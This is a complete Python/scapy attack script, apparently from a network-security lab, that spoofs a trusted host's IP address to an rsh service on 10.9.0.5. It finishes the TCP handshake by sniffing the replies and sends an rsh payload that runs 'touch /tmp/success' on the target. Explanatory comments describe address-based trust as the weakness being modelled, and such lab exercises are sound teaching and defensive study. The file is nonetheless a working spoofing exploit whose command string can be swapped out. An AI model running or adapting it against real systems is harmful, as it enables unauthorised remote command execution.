#!/usr/bin/python3
|
|
from scapy.all import *
|
|
|
|
# Lab addressing used by attack(); all four values are environment-specific
# and the 10.9.0.0/24 addresses are private-range, so nothing here is routable.
X_IP: str = "10.9.0.5"      # host that attack() sends to and sniffs traffic for
SRV_IP: str = "10.9.0.6"    # address written into the IP source field of every crafted packet
X_PORT: int = 514           # destination port on X_IP for the first connection
SRV_PORT: int = 1023        # source port claimed for the first connection
SECOND_PORT: int = 1022     # port named in the data payload; a SYN from X_IP to it is answered with SYN+ACK
def attack():
    """Drive one spoofed TCP exchange against X_IP and sniff the replies.

    Every packet built here carries ``src=SRV_IP`` in its IP header, so the
    replies from X_IP are addressed to SRV_IP rather than necessarily to the
    host running this script; they are observed with ``sniff`` on a bridge
    interface instead of through a socket.  The steps, all visible below, are:
    send a SYN to X_PORT; on the matching SYN+ACK send the ACK plus a
    NUL-separated data payload; on a later SYN from X_IP to SECOND_PORT answer
    with a SYN+ACK.  The function returns after the 15-second sniff window
    whether or not any of that was seen; it has no return value.

    Defensive reading: nothing in this exchange carries a credential beyond
    the names in the payload, so the remote side appears to trust the source
    address alone (the comment below refers to rsh).  Address-based trust is
    the weakness being modelled; the script also does not need to guess the
    remote ISN because it reads it from the sniffed SYN+ACK.
    """
    # ISN for the spoofed side.  Any constant works: this script picks its
    # own sequence number and never has to predict the remote one.
    my_seq = 0x12345678

    # Send SYN
    print("Sending SYN...")
    ip = IP(src=SRV_IP, dst=X_IP)
    tcp = TCP(sport=SRV_PORT, dport=X_PORT, flags="S", seq=my_seq)
    send(ip/tcp, verbose=0)

    def handle_pkt(pkt):
        """sniff() callback: react to the two TCP packets the exchange expects.

        Always returns False.  NOTE(review): scapy prints a prn return value
        unless it is None -- confirm this does not print "False" per packet;
        returning None (or nothing) would be the quiet choice.
        """
        # Declared nonlocal but never rebound below; a plain read of the
        # closure variable would behave the same.
        nonlocal my_seq
        # The BPF filter already restricts to TCP; this guards the pkt[TCP]
        # indexing below in case something else slips through.
        if pkt.haslayer(TCP):
            # Handshake for first connection
            # Match only the SYN+ACK from X_IP that answers our spoofed SYN.
            if pkt[TCP].flags == "SA" and pkt[IP].src == X_IP and pkt[TCP].dport == SRV_PORT:
                print(f"Received SYN+ACK for first connection (Seq: {pkt[TCP].seq})")
                # Send ACK
                # The remote ISN is taken from the sniffed packet, so ack is
                # exact; my_seq + 1 because the SYN consumed one sequence number.
                ack_pkt = IP(src=SRV_IP, dst=X_IP) / \
                    TCP(sport=SRV_PORT, dport=X_PORT, flags="A",
                        seq=my_seq + 1, ack=pkt[TCP].seq + 1)
                send(ack_pkt, verbose=0)

                # Send Data
                # Four NUL-terminated fields: the port for the second
                # connection, two names, and a command string.  The comment in
                # the elif branch mentions rsh, so this is presumably its wire
                # format -- confirm against the protocol reference.
                data = f"{SECOND_PORT}\x00seed\x00seed\x00touch /tmp/success\x00"
                # First data segment reuses the ACK's sequence number (no
                # payload has been sent yet), with PSH+ACK set.
                data_pkt = IP(src=SRV_IP, dst=X_IP) / \
                    TCP(sport=SRV_PORT, dport=X_PORT, flags="PA",
                        seq=my_seq + 1, ack=pkt[TCP].seq + 1) / data
                print("Sending Data...")
                send(data_pkt, verbose=0)

            # Handshake for second connection
            # X_IP opens a connection back to SECOND_PORT; answer its SYN only.
            elif pkt[TCP].flags == "S" and pkt[IP].src == X_IP and pkt[TCP].dport == SECOND_PORT:
                print(f"Received SYN for second connection (Seq: {pkt[TCP].seq})")
                # Send SYN+ACK
                # Fixed ISN for the spoofed server side of the second flow;
                # nothing further is ever sent on this connection.
                srv_seq = 0x87654321
                sa_pkt = IP(src=SRV_IP, dst=X_IP) / \
                    TCP(sport=SECOND_PORT, dport=pkt[TCP].sport, flags="SA",
                        seq=srv_seq, ack=pkt[TCP].seq + 1)
                send(sa_pkt, verbose=0)
                print("Sent SYN+ACK for second connection")
                # We should also acknowledge the final ACK from X-Terminal if needed,
                # but rsh might proceed anyway.
        return False

    # Interface name is environment-specific (it looks like a container
    # bridge); the capture is limited to TCP traffic involving X_IP and
    # stops after 15 seconds no matter what was seen.
    sniff(iface="br-63cae30f0395", filter=f"tcp and host {X_IP}", prn=handle_pkt, timeout=15)
def main() -> None:
    """Script entry point: run the single attack() sequence and return."""
    attack()


if __name__ == "__main__":
    main()